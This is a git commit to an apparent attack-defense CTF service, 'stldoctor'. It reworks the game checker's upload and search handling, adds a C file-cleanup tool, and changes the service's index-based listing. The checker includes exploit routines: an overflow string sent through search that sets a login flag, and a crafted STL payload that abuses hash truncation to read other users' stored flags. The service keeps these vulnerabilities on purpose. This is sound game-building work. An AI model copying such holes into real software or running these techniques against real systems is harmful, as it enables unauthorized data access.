commit 8e430a00c145647cf6a67504640bd919af2c4fdf
parent 3139342aa61d78985298d7450f97513a8aeec681
Author: Louis Burda <quent.burda@gmail.com>
Date: Wed, 7 Jul 2021 23:17:31 +0200
stash before adding attack_info for fixing exploit variant 2
Diffstat:
13 files changed, 412 insertions(+), 175 deletions(-)
diff --git a/.github/workflows/enochecker_test.yml b/.github/workflows/enochecker_test.yml
@@ -28,6 +28,10 @@ jobs:
run: |
python -m pip install --upgrade pip
pip install enochecker-test
+ - name: test checker style
+ run: |
+ cd checker
+ make lint
- name: start service
run: |
cd service
diff --git a/checker/local.sh b/checker/local.sh
@@ -11,4 +11,4 @@ export MONGO_PORT=27017
export MONGO_USER=stldoctor_checker
export MONGO_PASSWORD=stldoctor_checker
-python3 src/checker.py $@
+python3 -u src/checker.py $@
diff --git a/checker/src/checker.py b/checker/src/checker.py
@@ -53,7 +53,7 @@ solid test\xff
vertex 0 1 0
endloop
endfacet
-endsolid test\xff
+endsolid
"""
checker = Enochecker("stldoctor", 9090)
@@ -82,7 +82,7 @@ class Session:
return self
async def __aexit__(self, *args: list[Any], **kwargs: dict[str, Any]) -> None:
- await timed(self.exit(), self.logger, ctx="closing session")
+ await timed(self.close(), self.logger, ctx="closing session")
async def readuntil(self, target: bytes, ctx: Optional[str] = None) -> bytes:
try:
@@ -133,25 +133,16 @@ def _get_session(socket: AsyncSocket, logger: LoggerAdapter) -> Session:
return Session(socket, logger)
-def ensure_bytes(v: Union[str, bytes]) -> bytes:
- if type(v) == bytes:
- return v
- elif type(v) == str:
- return v.encode()
- else:
- raise InternalErrorException(f"Tried to convert {type(v)} arg to bytes")
-
-
def includes_all(resp: bytes, targets: list[bytes]) -> bool:
for m in targets:
- if ensure_bytes(m) not in resp:
+ if m not in resp:
return False
return True
def includes_any(resp: bytes, targets: list[bytes]) -> bool:
for m in targets:
- if ensure_bytes(m) in resp:
+ if m in resp:
return True
return False
@@ -420,36 +411,57 @@ async def do_upload(
stlfile: bytes,
check: bool = True,
) -> Optional[bytes]:
- # Upload file
+
session.logger.debug(f"Uploading model with name {modelname!r}")
session.write(b"upload\n")
+
+ # enter name and check resp
session.write(modelname + b"\n")
+ await session.drain()
+ await session.readuntil(b"name: ")
+ resp = await session.read(4, ctx="checking for err response")
+ if resp == b"ERR:":
+ if check:
+ resp = resp + await session.readline()
+ session.logger.critical(f"Failed during name check: {resp!r}")
+ raise MumbleException("File upload not working properly")
+ return None
+
+ # enter size and check resp
+ await session.readuntil(b"size: ")
session.write(f"{len(stlfile)}\n".encode())
- session.write(stlfile)
await session.drain()
+ resp = await session.read(4, ctx="checking for err response")
+ if resp == b"ERR:":
+ if check:
+ resp = resp + await session.readline()
+ session.logger.critical(f"Failed during size check: {resp!r}")
+ raise MumbleException("File upload not working properly")
+ return None
- # Check for errors
- # TODO improve by reading responses separately
- resp = await session.readline(ctx="reading upload response (1)")
- resp += await session.readline(ctx="reading upload response (2)")
+ await session.readuntil(b"listening..\n")
+ session.write(stlfile)
+ await session.drain()
+ resp = await session.readline()
if b"ERR:" in resp:
if check:
- session.logger.critical(f"Failed to upload model {modelname!r}:\n{resp!r}")
+ session.logger.critical(f"Failed during stl parsing: {resp!r}")
raise MumbleException("File upload not working properly")
- await session.readuntil(prompt, ctx="waiting for prompt")
return None
- # Parse ID
+ # parse returned id
try:
modelid = resp.rsplit(b"!", 1)[0].split(b"with ID ", 1)[1]
if modelid == b"":
raise Exception
except:
session.logger.critical(
- f"Invalid response during upload of {modelname!r}:\n{resp!r}"
+ f"Invalid file size during upload of {modelname!r}:\n{resp!r}"
)
raise MumbleException("File upload not working properly")
+ session.logger.debug(f"Uploaded model id: {modelid!r}")
+
await session.readuntil(prompt, ctx="waiting for prompt")
return modelid
@@ -460,38 +472,38 @@ async def do_search(
download: bool = False,
check: bool = True,
) -> Optional[tuple[bytes, bytes]]:
- modelname = ensure_bytes(modelname)
-
- # Initiate download
session.logger.debug(f"Retrieving model with name {modelname!r}")
+
+ # get possible hashes
session.write(b"search " + modelname + b"\n")
- session.write(b"0\n") # first result
- session.write(b"y\n" if download else b"n\n")
- session.write(b"q\n") # quit
await session.drain()
-
- # Check if an error occured
- line = await session.readline()
- if b"ERR:" in line:
+ resp = await session.readline()
+ if b"ERR:" in resp:
if check:
session.logger.critical(
- f"Failed to retrieve model {modelname!r}:\n{line!r}"
+ f"Failed to retrieve model {modelname!r}:\n{resp!r}"
)
raise MumbleException("File search not working properly")
- if b"Couldn't find a matching scan result" in line:
- # collect all the invalid commands sent after (hacky)
- # TODO: improve by checking every response in search
- await session.readuntil(prompt)
- await session.readuntil(prompt)
- await session.readuntil(prompt)
- await session.readuntil(prompt)
return None
+ resp = resp + await session.readuntil(b"> ")
+ results = [l.strip() for l in resp[:-2].split(b"\n")]
- # read until end of info box
- fileinfo = line + await session.readuntil(
+ # request first result
+ session.write(results[0] + b"\n")
+ await session.drain()
+ resp = await session.readline()
+ if b"ERR:" in resp:
+ if check:
+ session.logger.critical(f"Error selecting file: {results[0]!r}")
+ raise MumbleException("File search not working properly")
+ return None
+ fileinfo = resp + await session.readuntil(
b"================== \n", ctx="reading stl info"
)
+ # download if requested
+ session.write(b"y\n" if download else b"n\n")
+ await session.drain()
stlfile = b""
if download: # Parse file contents
await session.readuntil(b"Here you go.. (", ctx="reading stl size (1)")
@@ -499,13 +511,15 @@ async def do_search(
resp = resp[:-3]
size = parse_int(resp)
if size is None:
- raise MumbleException(
- f"Received invalid download size, response:\n{resp!r}"
- )
-
+ raise MumbleException(f"Invalid download size: {resp!r}")
session.logger.debug(f"Download size: {size}")
stlfile = await session.read(size, ctx="reading stl contents")
+ # only one result
+ session.write(b"q\n")
+ await session.drain()
+
+ # cleanup..
await session.readuntil(prompt)
return fileinfo, stlfile
@@ -513,14 +527,6 @@ async def do_search(
# CHECK WRAPPERS #
-async def check_line(session: Session, context: str) -> bytes:
- line = await session.readline()
- if b"ERR:" in line:
- session.logger.critical(f"{context}: Unexpected error message\n")
- raise MumbleException("Service returned error during valid interaction")
- return line
-
-
async def check_listed(session: Session, includes: list[bytes]) -> bytes:
resp = await do_list(session, check=True)
assert resp is not None
@@ -742,7 +748,8 @@ async def test_bad_upload(di: DependencyInjector, filetype: str, variant: int) -
# Ensure a malformed file causes an error
session = await di.get(Session)
- if await do_upload(session, modelname, stlfile, check=False):
+ resp = await do_upload(session, modelname, stlfile, check=False)
+ if resp is not None:
session.logger.critical(f"Able to upload malformed file:\n{stlfile!r}")
raise MumbleException("Upload validation not working properly")
@@ -754,8 +761,8 @@ async def test_search(di: DependencyInjector, registered: bool = False) -> None:
session = await di.get(Session)
if registered:
await do_auth(session, authstr, check=True)
- if resp := await do_search(session, modelname, download=False, check=False):
- assert resp is not None
+ resp = await do_search(session, modelname, download=False, check=False)
+ if resp is not None:
session.logger.critical(
f"Search for file that shouldn't exist succeeded:\n{resp[0]+resp[1]!r}"
)
@@ -1002,33 +1009,45 @@ async def exploit_prefix_truncation(di: DependencyInjector) -> bytes:
modelname = fakeid()
searcher = await di.get(FlagSearcher)
- # Upload evil file for parse via search for hash truncation
session = await di.get(Session)
session.logger.debug("Uploading evil file for hash truncation")
+
+ # Upload evil file
await do_upload(session, modelname, stlfile=search_truncation_payload, check=True)
search_resp = await do_search(session, modelname, download=False, check=True)
- assert search_resp is not None
- info, contents = search_resp
+ print(search_resp)
+
+ # Retrieve evil file for hash truncation
session.write(b"search last\n")
await session.drain()
- filelist_resp = await session.readuntil(b"? ", ctx="reading search results")
- filelist = [
- l.strip().split(b" : ")[1] for l in filelist_resp.split(b"\n") if b" : " in l
- ]
+ filelist_resp = await session.readuntil(
+ b"[q to quit]: ", ctx="reading search results"
+ )
+ session.logger.critical(filelist_resp)
+ filelist = [l.strip() for l in filelist_resp.split(b"\n")[:-1] if l.strip() != b""]
if len(filelist) == 0:
raise MumbleException("Failed to list files through search")
+ session.logger.critical(filelist)
# Use it to enumerate other files and grab contents
flag = None
- for i, fhash in enumerate(filelist):
- session.logger.debug(f"Retrieving file {fhash} at index {i}")
- session.write(f"{i}\nn\n".encode())
+ for fhash in filelist:
+ session.logger.debug(f"Retrieving file {fhash}")
+ session.write(fhash + b"\n")
+ session.write(b"n\n")
await session.drain()
- filelist_resp = await session.readuntil(
+ resp = await session.readline()
+ if b"ERR:" in resp:
+ session.logger.critical(f"Failed on selection of file: {resp!r}")
+ raise MumbleException("Failed to retrieve file contents via exploit")
+ resp += await session.readuntil(
b"==================", ctx="getting file info (1)"
)
- filelist_resp += await session.readuntil(b"? ", ctx="getting file info (2)")
- if flag := searcher.search_flag(filelist_resp.decode("latin1")):
+ resp += await session.readuntil(
+ b"[q to quit]: ", ctx="getting file info (2)"
+ )
+ session.logger.critical(resp)
+ if flag := searcher.search_flag(resp):
break
# Done!
@@ -1050,7 +1069,7 @@ async def exploit_hash_overflow(di: DependencyInjector) -> None:
session = await di.get(Session)
session.write(b"search \xff\xff\xff\xff\xff0000000000000000\n")
await session.drain()
- await session.readuntil(prompt, ctx="getting user hashes via search")
+ await session.readuntil(prompt, ctx="overflowing loggedin via search")
session.write(b"auth\n")
await session.drain()
resp = await session.readuntil(prompt, ctx="checking auth success")
@@ -1058,9 +1077,8 @@ async def exploit_hash_overflow(di: DependencyInjector) -> None:
raise MumbleException("Exploit did not set 'loggedin' variable via overflow")
# Get private user hashes via 'list'
- resp = await do_list(session, check=False)
- if not resp:
- raise MumbleException("")
+ resp = await do_list(session, check=True)
+ session.logger.critical(resp)
users = [l.split(b" .")[1] for l in resp.split(b"\n") if b">> ." in l]
await session.exit()
@@ -1088,7 +1106,7 @@ async def exploit_hash_overflow(di: DependencyInjector) -> None:
solidnames = b"\n".join(
[l.split(b": ", 1)[1] for l in resp.split(b"\n") if b"Solid Name: " in l]
)
- if flag := searcher.search_flag(solidnames.decode("latin1")):
+ if flag := searcher.search_flag(solidnames):
return flag
raise MumbleException("Exploit for flagstore 2 failed")
diff --git a/service/Dockerfile b/service/Dockerfile
@@ -8,16 +8,19 @@ RUN adduser --system --ingroup service --uid 1000 service
COPY entrypoint.sh /
RUN chmod 755 /entrypoint.sh
-COPY cleaner.sh /
-RUN chmod 755 /cleaner.sh
+COPY cleaner /cleaner
+RUN make -C /cleaner clean && make -C /cleaner
+RUN cp /cleaner/cleaner /usr/bin/cleaner
+run chmod +x /usr/bin/cleaner
COPY src/ /service/
+RUN make -C /service clean && make -C /service
+RUN chmod +x /service/build/stldoctor
WORKDIR /service/
-RUN make clean && make
-
-EXPOSE 9000
ENV RESULTDIR=/data/uploads
+EXPOSE 9000
+
ENTRYPOINT ["/entrypoint.sh"]
diff --git a/service/cleaner.sh b/service/cleaner.sh
@@ -1,24 +0,0 @@
-#!/bin/sh
-
-timeref="/data/lastclean"
-
-if [ -z "$RESULTDIR" ]; then
- echo "RESULTDIR is undefined! skipping cleanup.."
- exit 1
-fi
-
-if [ -f "$timeref" ]; then
- files="$(find "$RESULTDIR" -mindepth 1 \! -newer "$timeref")"
- echo "$files" | while read path; do
- rm -rf "$path"
- done
- if [ -z "$files" ]; then
- filecount=0
- else
- filecount=$(echo "$files" | wc -l)
- fi
- echo "[ $(date +%T) ] Removed $filecount old files!"
-fi
-
-touch "$timeref"
-
diff --git a/service/cleaner/.gitignore b/service/cleaner/.gitignore
@@ -0,0 +1 @@
+cleaner
diff --git a/service/cleaner/Makefile b/service/cleaner/Makefile
@@ -0,0 +1,7 @@
+all: cleaner
+
+clean:
+ rm cleaner
+
+cleaner: main.c
+ $(CC) -o $@ $<
diff --git a/service/cleaner/main.c b/service/cleaner/main.c
@@ -0,0 +1,155 @@
+#include <stdlib.h>
+#include <stdio.h>
+#include <stdarg.h>
+#include <string.h>
+
+#include <unistd.h>
+#include <dirent.h>
+#include <time.h>
+#include <sys/file.h>
+#include <sys/stat.h>
+
+void
+die(const char *fmtstr, ...)
+{
+ va_list ap;
+
+ fprintf(stderr, "CLEANER: ");
+ va_start(ap, fmtstr);
+ vfprintf(stderr, fmtstr, ap);
+ va_end(ap);
+
+ exit(EXIT_FAILURE);
+}
+
+int
+creation_time(const char *path)
+{
+ struct stat attrib;
+
+ stat(path, &attrib);
+ return attrib.st_ctim.tv_sec;
+}
+
+char*
+aprintf(const char *fmtstr, ...)
+{
+ va_list ap, cpy;
+ size_t nb;
+ char *str;
+
+ va_copy(cpy, ap);
+
+ va_start(cpy, fmtstr);
+ nb = vsnprintf(NULL, 0, fmtstr, cpy);
+ va_end(cpy);
+
+ if (nb <= 0) die("Invalid fmtstr!\n");
+ str = malloc(nb+1);
+ if (!str) die("Alloc of fmtstr failed\n");
+
+ va_start(ap, fmtstr);
+ nb = vsnprintf(str, nb+1, fmtstr, ap);
+ va_end(ap);
+
+ return str;
+}
+
+void
+recdel(const char *path)
+{
+ struct stat attrib;
+ struct dirent *de;
+ char *subpath;
+ DIR *d;
+
+ stat(path, &attrib);
+ if (S_ISDIR(attrib.st_mode)) {
+ d = opendir(path);
+ while ((de = readdir(d))) {
+ if (!strcmp(de->d_name, ".") || !strcmp(de->d_name, ".."))
+ continue;
+ subpath = aprintf("%s/%s", path, de->d_name);
+ recdel(subpath);
+ free(subpath);
+ }
+ closedir(d);
+ rmdir(path);
+ } else {
+ remove(path);
+ }
+}
+
+int
+main(int argc, const char **argv)
+{
+ char buf[256], *end, *path,
+ **paths, *oldpath, *newpath;
+ unsigned long reftime;
+ int i, pathc, pathcap, nread;
+ const char *dirpath;
+ FILE *f, *fn;
+
+ if (argc != 3) die("USAGE: cleaner DIR REFTIME\n");
+
+ dirpath = argv[1];
+
+ reftime = strtoul(argv[2], &end, 10);
+ if (end && *end) die("Invalid unix time reference\n");
+
+ oldpath = aprintf("%s/.index", dirpath);
+ if (!(f = fopen(oldpath, "r+")))
+ die("Missing index file: %s\n", oldpath);
+ flock(fileno(f), LOCK_EX);
+
+ newpath = aprintf("%s/.index.next", dirpath);
+ if (!(fn = fopen(newpath, "w+")))
+ die("Failed to create index file: %s\n", newpath);
+
+ pathc = 0;
+ pathcap = 1024;
+ paths = malloc(pathcap * sizeof(char*));
+ if (!paths) die("OOM - allocating initial path array\n");
+
+ while (fgets(buf, sizeof(buf), f)) {
+ if (*buf && buf[strlen(buf)-1] == '\n')
+ buf[strlen(buf)-1] = '\0';
+
+ path = aprintf("%s/%s", dirpath, buf);
+ if (creation_time(path) < reftime) {
+ paths[pathc] = strdup(path);
+ if (!paths[pathc++]) die("OOM - during path str alloc\n");
+ if (pathc == pathcap) {
+ pathcap *= 2;
+ paths = realloc(paths, pathcap * sizeof(char*));
+ if (!paths) die("OOM - too many paths to alloc\n");
+ }
+ } else {
+ fwrite(buf, 1, strlen(buf), fn);
+ putc('\n', fn);
+ }
+ free(path);
+ }
+
+ fseek(f, 0, SEEK_SET);
+ fseek(fn, 0, SEEK_SET);
+ while ((nread = fread(buf, 1, sizeof(buf), fn)) > 0)
+ fwrite(buf, 1, nread, f);
+ ftruncate(fileno(f), ftell(f));
+
+ nread = ftell(f);
+
+ flock(fileno(f), LOCK_UN);
+ fclose(f);
+ fclose(fn);
+
+ if (!nread && getenv("DELROOT")) {
+ remove(oldpath);
+ remove(newpath);
+ }
+
+ for (i = 0; i < pathc; i++) {
+ printf("CLEANER: REMOVED %s\n", paths[i]);
+ recdel(paths[i]);
+ }
+}
diff --git a/service/entrypoint.sh b/service/entrypoint.sh
@@ -3,10 +3,19 @@
mkdir -p "$RESULTDIR"
chown -R service:service "$RESULTDIR"
+expiry=$((13*60))
while [ 1 ]; do
- /cleaner.sh
- sleep $((60*13)) # data persistence for atleast 11 rounds
+ reftime="$(($(date +%s)-$expiry))"
+ echo "[FILE CLEANUP] @ $(date +%T)"
+ cleaner "$RESULTDIR" "$reftime"
+ DELROOT=1 find "$RESULTDIR" -maxdepth 1 -regextype posix-extended \
+ -regex '.*/\.[^/]+$' ! -name .index ! -name .index.next \
+ -exec cleaner {} "$reftime" \;
+ find "$RESULTDIR" -regextype posix-extended \
+ -regex '.*/\.[^/]+$' -type d -empty -delete
+ sleep 70
done &
-CMD="socat -T180 -s TCP-LISTEN:9000,nodelay,reuseaddr,fork EXEC:/service/build/stldoctor,raw,pty,echo=0,stderr"
+CMD="socat -T180 -s TCP-LISTEN:9000,nodelay,reuseaddr,fork \
+EXEC:/service/build/stldoctor,raw,pty,echo=0,stderr"
su -s /bin/sh -c "$CMD" service
diff --git a/service/src/main.c b/service/src/main.c
@@ -2,7 +2,6 @@
#include <string.h>
#include <stdarg.h>
#include <unistd.h>
-#include <dirent.h>
#include <fcntl.h>
#include <time.h>
#include <errno.h>
@@ -56,7 +55,6 @@ save_submission(struct parseinfo *info, char *stldata, int stlsize)
*indexpath = NULL, *modelpath = NULL;
FILE *f = NULL;
int status = OK;
- DIR *d;
modeldir = aprintf("%s%s-%i", loggedin ? "." : "",
info->hash, time(NULL));
@@ -296,22 +294,28 @@ search_cmd(const char *arg)
while ((c = fgetc(f)) > 0) {
if (c == '\n') {
matchlen = 0;
+ continue;
} else if (matchlen == -1) {
continue;
+ } else if (!matchlen && c == '.') {
+ if (!loggedin) matchlen = -1;
+ continue;
} else if (c == hash[matchlen]) {
matchlen += 1;
- if (matchlen == strlen(hash)) {
- fseek(f, -matchlen, SEEK_CUR);
- putchar(' ');
- while ((c = fgetc(f)) > 0 && c != '\n')
- putchar(c);
- putchar('\n');
- matchlen = 0;
- reslen += 1;
- }
} else {
matchlen = -1;
}
+
+ if (matchlen == strlen(hash)) {
+ fseek(f, -matchlen, SEEK_CUR);
+ putchar(' ');
+ if (loggedin) putchar('.');
+ while ((c = fgetc(f)) > 0 && c != '\n')
+ putchar(c);
+ putchar('\n');
+ matchlen = 0;
+ reslen += 1;
+ }
}
flock(fileno(f), LOCK_UN);
@@ -326,7 +330,7 @@ search_cmd(const char *arg)
resp = ask("> Enter %s [q to quit]: ",
resp ? "another" : "hash");
if (strchr(resp, 'q')) break;
- if (checkalph(resp, "abcdef0123456789-") != OK) {
+ if (checkalph(resp, ".abcdef0123456789-") != OK) {
ERR("Invalid model id specified\n");
goto exit;
}
@@ -345,43 +349,50 @@ exit:
void
list_cmd(const char *arg)
{
- struct dirent *de;
struct parseinfo info;
- char *path;
- FILE *f;
- DIR *d;
+ char buf[256], *path;
+ FILE *f, *fn;
if (!loggedin) {
ERR("Not logged in!\n");
return;
}
- if (!(d = opendir(resultdir))) return;
-
- while ((de = readdir(d))) {
- if (*de->d_name == '.' && !strchr(".", de->d_name[1])) {
- printf(">> %s\n", de->d_name);
- path = aprintf("%s/%s/info", resultdir, de->d_name);
- if ((f = fopen(path, "r")) && load_info(&info, f) == OK) {
- print_info(&info);
- free_info(&info);
- } else {
- ERR("Failed to read file info!\n");
- }
- if (f) fclose(f);
- free(path);
- }
+ path = aprintf("%s/.index", resultdir);
+ if (!(f = fopen(path, "r"))) {
+ ERR("Failed to get files index\n");
+ free(path);
+ return;
}
+ free(path);
- closedir(d);
+ flock(fileno(f), LOCK_SH);
+ while (fgets(buf, sizeof(buf), f)) {
+ if (*buf && buf[strlen(buf)-1] == '\n')
+ buf[strlen(buf)-1] = '\0';
+
+ printf(">> %s\n", buf);
+ path = aprintf("%s/%s/info", resultdir, buf);
+ if ((fn = fopen(path, "r")) && load_info(&info, fn) == OK) {
+ print_info(&info);
+ free_info(&info);
+ } else {
+ ERR("Failed to read file info!\n");
+ }
+ if (fn) fclose(f);
+ free(path);
+ }
+ flock(fileno(f), LOCK_UN);
+ fclose(f);
}
void
auth_cmd(const char *arg)
{
const char *hash;
- char *ndir;
+ char *ndir, *indexpath;
int ret;
+ FILE *f;
if (loggedin) {
ERR("Already logged in!\n");
@@ -400,6 +411,22 @@ auth_cmd(const char *arg)
return;
}
+ if (errno != EEXIST) {
+ indexpath = aprintf("%s/.index", resultdir);
+ if (!(f = fopen(indexpath, "a+"))) {
+ free(indexpath);
+ ERR("Auth failed!\n");
+ return;
+ }
+ flock(fileno(f), LOCK_EX);
+ fputc('.', f);
+ fwrite(hash, 1, strlen(hash), f);
+ fputc('\n', f);
+ flock(fileno(f), LOCK_UN);
+ fclose(f);
+ free(indexpath);
+ }
+
free(resultdir);
resultdir = ndir;
loggedin = 1;
diff --git a/src/main.c b/src/main.c
@@ -2,7 +2,6 @@
#include <string.h>
#include <stdarg.h>
#include <unistd.h>
-#include <dirent.h>
#include <fcntl.h>
#include <time.h>
#include <errno.h>
@@ -56,7 +55,6 @@ save_submission(struct parseinfo *info, char *stldata, int stlsize)
*indexpath = NULL, *modelpath = NULL;
FILE *f = NULL;
int status = OK;
- DIR *d;
modeldir = aprintf("%s%s-%i", loggedin ? "." : "",
info->hash, time(NULL));
@@ -299,22 +297,28 @@ search_cmd(const char *arg)
while ((c = fgetc(f)) > 0) {
if (c == '\n') {
matchlen = 0;
+ continue;
} else if (matchlen == -1) {
continue;
+ } else if (!matchlen && c == '.') {
+ if (!loggedin) matchlen = -1;
+ continue;
} else if (c == hash[matchlen]) {
matchlen += 1;
- if (matchlen == strlen(hash)) {
- fseek(f, -matchlen, SEEK_CUR);
- putchar(' ');
- while ((c = fgetc(f)) > 0 && c != '\n')
- putchar(c);
- putchar('\n');
- matchlen = 0;
- reslen += 1;
- }
} else {
matchlen = -1;
}
+
+ if (matchlen == strlen(hash)) {
+ fseek(f, -matchlen, SEEK_CUR);
+ putchar(' ');
+ if (loggedin) putchar('.');
+ while ((c = fgetc(f)) > 0 && c != '\n')
+ putchar(c);
+ putchar('\n');
+ matchlen = 0;
+ reslen += 1;
+ }
}
flock(fileno(f), LOCK_UN);
@@ -330,7 +334,7 @@ search_cmd(const char *arg)
resp = ask("> Enter %s [q to quit]: ",
resp ? "another" : "hash");
if (strchr(resp, 'q')) break;
- if (checkalph(resp, "abcdef0123456789-") != OK) {
+ if (checkalph(resp, ".abcdef0123456789-") != OK) {
ERR("Invalid model id specified\n");
goto exit;
}
@@ -349,43 +353,50 @@ exit:
void
list_cmd(const char *arg)
{
- struct dirent *de;
struct parseinfo info;
- char *path;
- FILE *f;
- DIR *d;
+ char buf[256], *path;
+ FILE *f, *fn;
if (!loggedin) {
ERR("Not logged in!\n");
return;
}
- if (!(d = opendir(resultdir))) return;
-
- while ((de = readdir(d))) {
- if (*de->d_name == '.' && !strchr(".", de->d_name[1])) {
- printf(">> %s\n", de->d_name);
- path = aprintf("%s/%s/info", resultdir, de->d_name);
- if ((f = fopen(path, "r")) && load_info(&info, f) == OK) {
- print_info(&info);
- free_info(&info);
- } else {
- ERR("Failed to read file info!\n");
- }
- if (f) fclose(f);
- free(path);
- }
+ path = aprintf("%s/.index", resultdir);
+ if (!(f = fopen(path, "r"))) {
+ ERR("Failed to get files index\n");
+ free(path);
+ return;
}
+ free(path);
- closedir(d);
+ flock(fileno(f), LOCK_SH);
+ while (fgets(buf, sizeof(buf), f)) {
+ if (*buf && buf[strlen(buf)-1] == '\n')
+ buf[strlen(buf)-1] = '\0';
+
+ printf(">> %s\n", buf);
+ path = aprintf("%s/%s/info", resultdir, buf);
+ if ((fn = fopen(path, "r")) && load_info(&info, fn) == OK) {
+ print_info(&info);
+ free_info(&info);
+ } else {
+ ERR("Failed to read file info!\n");
+ }
+ if (fn) fclose(f);
+ free(path);
+ }
+ flock(fileno(f), LOCK_UN);
+ fclose(f);
}
void
auth_cmd(const char *arg)
{
const char *hash;
- char *ndir;
+ char *ndir, *indexpath;
int ret;
+ FILE *f;
if (loggedin) {
ERR("Already logged in!\n");
@@ -404,6 +415,22 @@ auth_cmd(const char *arg)
return;
}
+ if (errno != EEXIST) {
+ indexpath = aprintf("%s/.index", resultdir);
+ if (!(f = fopen(indexpath, "a+"))) {
+ free(indexpath);
+ ERR("Auth failed!\n");
+ return;
+ }
+ flock(fileno(f), LOCK_EX);
+ fputc('.', f);
+ fwrite(hash, 1, strlen(hash), f);
+ fputc('\n', f);
+ flock(fileno(f), LOCK_UN);
+ fclose(f);
+ free(indexpath);
+ }
+
free(resultdir);
resultdir = ndir;
loggedin = 1;
diff --git a/tests/data/evil2.stl b/tests/data/evil2.stl
@@ -0,0 +1,9 @@
+solid test˙3ac
+ facet normal 0 0 1.0
+ outer loop
+ vertex 1 0 0
+ vertex 1 1 0
+ vertex 0 1 0
+ endloop
+ endfacet
+endsolid
diff --git a/tests/test.sh b/tests/test.sh
@@ -89,6 +89,7 @@ elif [ "$1" == "stl-upload" ]; then
name="${3:-samplefile}"
(
echo "echo"
+ [ ! -z "$AUTH" ] && echo "auth $AUTH"
echo "upload"
echo "$name"
cat "$file" | wc -c